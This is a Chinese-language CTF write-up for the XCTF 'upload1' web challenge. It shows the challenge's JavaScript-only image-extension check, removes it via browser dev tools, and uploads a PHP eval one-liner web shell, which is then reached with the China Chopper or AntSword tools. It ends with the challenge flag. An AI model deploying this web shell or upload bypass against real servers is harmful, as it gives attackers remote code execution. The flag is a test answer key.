【攻防世界 XCTF】 WEB 高手進階 upload1 ——賣菜刀，上蟻劍

<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript">
 

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('請選擇一張圖片文件上傳!');
}


}

</script>

</head>
<body>



<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> 
<input  id="upfile" name='upfile' type='file' onchange="check();" /> 

<input type='submit'  id ='submit' value='上傳'> 
</form> 



</body>

前端上傳限制只能是圖片

F12
把前端裏面的限制函數刪掉！

變成這樣子——

上傳一句話 我愛你 ：Trojan

<?php @eval($_POST['x']) ?>

在這個頁面
http://124.126.19.106:55113/index.php
上傳成功

找到上傳文件的位置，題目顯示了/upload/1588499500.cknife.php

所以文件就在
http://124.126.19.106:55113/upload/1588499500.cknife.php

菜刀可，蟻劍也可

你若菜刀cknife

法寶一：

不二法寶：
附上小旗幟🚩
flag=“cyberpeace{5327a18ceab8d7b4b1db828776bbe303}”